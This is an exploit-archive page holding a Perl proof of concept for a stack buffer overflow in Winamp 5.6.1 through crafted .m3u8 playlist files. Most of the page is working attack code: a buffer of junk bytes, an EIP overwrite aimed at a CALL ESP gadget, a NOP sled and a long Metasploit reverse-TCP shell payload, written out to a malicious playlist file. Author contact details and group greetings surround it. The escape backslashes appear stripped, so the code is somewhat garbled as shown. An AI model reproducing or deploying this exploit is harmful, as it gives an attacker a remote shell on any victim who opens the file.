Home / exploitsPDF  

Winamp 5.6.1 .m3u8 Buffer Overflow

Posted on 12 April 2011

#!/usr/bin/perl

###
# Title : Winamp 5.6.1 (.m3u8) Stack Buffer Overflow
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com || ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : windows
# Impact : Stack Overflow
# Tested on : Windows XP sp3 FR
###
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
##
# [»] ~ special thanks to : jos_ali_joe (exploit-id.com) , and All exploit-id Team
###

my $header = "#EXTM3U
";
my $junk = "x41" x 16240; # Buffer Junk
my $eip = "xadx86x0ex07"; # overwrite EIP - 070E86AD | FFD4 CALL ESP nde.dll
my $seh = pack('V',0x10017928);  # add ESP,4404
$seh = $seh.pack('V',0x00000003); # Value de : EAX
$seh = $seh."x41" x 11;
$seh = $seh.pack('V',0x41414141); # Value de : ECX
$seh = $seh."x41" x 3;
$seh = $seh.pack('V',0x007EA478); # Value de : EDX
$seh = $seh."x41" x 22;
$seh = $seh.pack('V',0x40000001); # Value de : EBX
$seh = $seh."x41" x 8;
$seh = $seh.pack('V',0x028F1DB0); # Valeu de : ESP
$seh = $seh."x41" x 12;
$seh = $seh.pack('V',0x77230459); # Valeu de : EBP
$seh = $seh."x41" x 10;
$seh = $seh.pack('V',0x08FD62A8); # Valeu de : ESI
$seh = $seh."x41" x 11;
$seh = $seh.pack('V',0x00497300); # Valeu de : EDI
$seh = $seh."x41" x 2;
$seh = $seh.pack('V',0x08FD293C); # Valeu de : EIP
$seh = $seh."x41" x 5;
my $nops = "x90" x 100; # Nop
my $space = "x41" x (43492 - length($junk) - length($nops));
my $shellcode = # windows/shell_reverse_tcp (http://www.metasploit.com)
"x56x54x58x36x33x30x56x58x48x34x39x48x48x48" .
"x50x68x59x41x41x51x68x5ax59x59x59x59x41x41" .
"x51x51x44x44x44x64x33x36x46x46x46x46x54x58" .
"x56x6ax30x50x50x54x55x50x50x61x33x30x31x30" .
"x38x39x49x49x49x49x49x49x49x49x49x49x49x49" .
"x49x49x49x49x49x37x51x5ax6ax41x58x50x30x41" .
"x30x41x6bx41x41x51x32x41x42x32x42x42x30x42" .
"x42x41x42x58x50x38x41x42x75x4ax49x4bx4cx4d" .
"x38x4ex69x47x70x43x30x45x50x45x30x4dx59x4a" .
"x45x45x61x48x52x43x54x4ex6bx50x52x50x30x4c" .
"x4bx51x42x46x6cx4ex6bx46x32x46x74x4cx4bx50" .
"x72x46x48x46x6fx4fx47x43x7ax51x36x46x51x49" .
"x6fx46x51x4fx30x4ex4cx47x4cx43x51x43x4cx43" .
"x32x44x6cx47x50x4fx31x48x4fx46x6dx43x31x49" .
"x57x48x62x4cx30x51x42x42x77x4cx4bx50x52x42" .
"x30x4cx4bx43x72x45x6cx46x61x4ax70x4cx4bx43" .
"x70x43x48x4ex65x4bx70x42x54x50x4ax45x51x48" .
"x50x46x30x4ex6bx50x48x45x48x4ex6bx51x48x51" .
"x30x45x51x48x53x48x63x47x4cx43x79x4ex6bx47" .
"x44x4ex6bx46x61x4bx66x50x31x4bx4fx44x71x4f" .
"x30x4ex4cx49x51x4ax6fx46x6dx46x61x4fx37x46" .
"x58x4dx30x42x55x4ax54x46x63x43x4dx4cx38x47" .
"x4bx51x6dx44x64x44x35x49x72x43x68x4cx4bx50" .
"x58x45x74x47x71x48x53x51x76x4ex6bx46x6cx42" .
"x6bx4cx4bx42x78x47x6cx45x51x48x53x4ex6bx45" .
"x54x4cx4bx47x71x48x50x4fx79x42x64x44x64x47" .
"x54x51x4bx51x4bx43x51x50x59x43x6ax46x31x4b" .
"x4fx4dx30x50x58x43x6fx43x6ax4cx4bx45x42x48" .
"x6bx4ex66x43x6dx42x48x50x33x44x72x45x50x43" .
"x30x51x78x42x57x42x53x46x52x43x6fx50x54x43" .
"x58x42x6cx44x37x44x66x45x57x49x6fx48x55x48" .
"x38x4cx50x47x71x45x50x47x70x47x59x4bx74x51" .
"x44x42x70x42x48x44x69x4dx50x42x4bx43x30x49" .
"x6fx48x55x50x50x42x70x50x50x42x70x47x30x42" .
"x70x43x70x50x50x43x58x48x6ax44x4fx49x4fx4d" .
"x30x49x6fx4bx65x4ex69x48x47x42x48x43x4fx45" .
"x50x43x30x47x71x43x58x43x32x45x50x44x51x43" .
"x6cx4ex69x4ax46x51x7ax42x30x51x46x43x67x42" .
"x48x4dx49x4ex45x51x64x51x71x49x6fx4ex35x50" .
"x68x42x43x42x4dx42x44x47x70x4cx49x48x63x51" .
"x47x51x47x51x47x50x31x4bx46x51x7ax47x62x51" .
"x49x50x56x4dx32x49x6dx50x66x4fx37x42x64x46" .
"x44x45x6cx47x71x43x31x4cx4dx50x44x51x34x42" .
"x30x4ax66x43x30x43x74x50x54x42x70x43x66x43" .
"x66x51x46x47x36x46x36x42x6ex50x56x46x36x42" .
"x73x43x66x50x68x44x39x48x4cx47x4fx4bx36x4b" .
"x4fx48x55x4cx49x4bx50x50x4ex42x76x43x76x49" .
"x6fx50x30x42x48x43x38x4cx47x47x6dx43x50x49" .
"x6fx4ex35x4fx4bx4ax50x4dx65x4dx72x51x46x51" .
"x78x4dx76x4ex75x4fx4dx4dx4dx4bx4fx48x55x47" .
"x4cx46x66x43x4cx45x5ax4bx30x49x6bx49x70x43" .
"x45x45x55x4dx6bx51x57x44x53x43x42x42x4fx51" .
"x7ax47x70x46x33x4bx4fx49x45x41x41";
my $end = "x90" x (20000 - $nops); # Nop sled
open(FILE,'>>KedAns.m3u8');
print FILE $header.$junk.$space.$seh.$nops.$eip.$shellcode.$end;
close(FILE);

#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * jos_ali_joe (exploit-id.com) * r0073rt (Inj3ct0r.com) * TreX (hotturks.org)
# Nayla Festa * all (sec4ever.com) Members * KelvinX (kelvinx.net) * PLATEN (Pentesters.ir)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.1337day.com * exploit-db.com * exploit-id.com * www.packetstormsecurity.org * bugsearch.net
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================

 

TOP

Malware :

Exploits :